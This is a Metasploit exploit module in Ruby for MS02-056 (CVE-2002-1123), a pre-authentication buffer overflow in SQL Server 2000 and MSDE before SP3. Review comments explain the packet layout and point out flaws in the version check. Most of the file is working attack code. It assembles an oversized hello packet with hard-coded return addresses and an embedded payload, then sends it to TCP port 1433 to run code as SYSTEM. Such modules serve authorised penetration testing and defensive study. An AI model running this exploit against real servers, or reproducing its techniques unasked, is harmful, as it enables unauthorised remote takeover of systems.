##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for MS02-056 / CVE-2002-1123: a buffer overflow reached through
# the "hello" traffic of Microsoft SQL Server 2000 / MSDE before SP3 (per the
# Description below). Everything the module sends is one oversized, fixed-layout
# packet to TCP/1433 from an unauthenticated client, which is also the only
# network artifact a defender has to look for; the vendor fix is MS02-056 / SP3.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  # Supplies the MSSQL client helpers used below (mssql_ping, connect, sock,
  # disconnect). Their exact behaviour lives in the mixin, not in this file.
  include Msf::Exploit::Remote::MSSQL

  # Registers the module metadata with the framework; no network activity here.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS02-056 Microsoft SQL Server Hello Overflow',
        'Description' => %q{
          By sending malformed data to TCP port 1433, an
          unauthenticated remote attacker could overflow a buffer and
          possibly execute code on the server with SYSTEM level
          privileges. This module should work against any vulnerable
          SQL Server 2000 or MSDE install (< SP3).
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2002-1123'],
          [ 'OSVDB', '10132'],
          [ 'BID', '5411'],
          [ 'MSB', 'MS02-056'],

        ],
        # The payload inherits the SQL service's privileges (SYSTEM per the Description).
        'Privileged' => true,
        'Payload' => {
          # Room reserved for payload.encoded inside the packet built in #exploit.
          'Space' => 512,
          # NUL is kept out of the encoded payload and out of every rand_text_english
          # filler below (they are generated with payload_badchars).
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
        'Targets' => [
          [
            'MSSQL 2000 / MSDE <= SP2',
            {
              'Platform' => 'win',
              # Consumed as target['Rets'][0] and target['Rets'][1] in #exploit;
              # only this one target exists, so DefaultTarget 0 is the sole choice.
              'Rets' => [0x42b68aba, 0x42d01e50],
            },
          ],
        ],
        'Platform' => 'win',
        'DisclosureDate' => '2002-08-05',
        'DefaultTarget' => 0,
        # NOTE(review): all three notes are left at UNKNOWN_*; whether a failed
        # attempt takes the SQL service down is not recorded anywhere in this file.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Probes the host with an MSSQL ping and prints whatever it learns.
  #
  # NOTE(review): this is discovery, not a vulnerability check. Detected is
  # returned for any server whose ping reply carries a ServerName; no version
  # or service-pack comparison is made, so a patched (SP3+) install reports
  # Detected too. Conversely, Safe is returned whenever no ServerName comes
  # back, which also covers unreachable or filtered hosts; CheckCode::Unknown
  # would describe that case more accurately.
  #
  # @return [Exploit::CheckCode] Detected when a ServerName was returned, else Safe
  def check
    info = mssql_ping
    if (info['ServerName'])
      print_status("SQL Server Information:")
      # Pads each key to 15 columns. String#* raises ArgumentError on a negative
      # count, so a key longer than 15 characters would abort the check here;
      # the keys mssql_ping returns are assumed to be shorter -- confirm.
      info.each_pair { |k, v|
        print_status(" #{k + (" " * (15 - k.length))} = #{v}")
      }
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  # Sends the single malformed hello packet and hands off to the payload handler.
  #
  # The buffer layout is fixed: a hard-coded header, 528 bytes of filler, four
  # fixed bytes, 4 bytes of filler, the two target return addresses packed as
  # little-endian 32-bit words ('V'; Rets[1] is repeated four times around the
  # literal '3333'), 88 more bytes of filler, payload.encoded, and a short
  # trailer. All filler comes from rand_text_english with payload_badchars, so
  # the NUL excluded by BadChars never appears in it.
  def exploit
    connect
    buf = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b" +
      "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" +
      "\x10\x00\x00\x00" +
      rand_text_english(528, payload_badchars) +
      "\x1B\xA5\xEE\x34" +
      rand_text_english(4, payload_badchars) +
      [ target['Rets'][0] ].pack('V') +
      [ target['Rets'][1], target['Rets'][1] ].pack('VV') +
      '3333' +
      [ target['Rets'][1], target['Rets'][1] ].pack('VV') +
      rand_text_english(88, payload_badchars) +
      payload.encoded +
      "\x00\x24\x01\x00\x00"

    # The whole buffer goes out in one write; nothing is read back.
    sock.put(buf)

    # handler (framework base class) runs before the socket is torn down;
    # presumably it waits on the payload's session -- confirm in the base class.
    handler
    disconnect
  end
end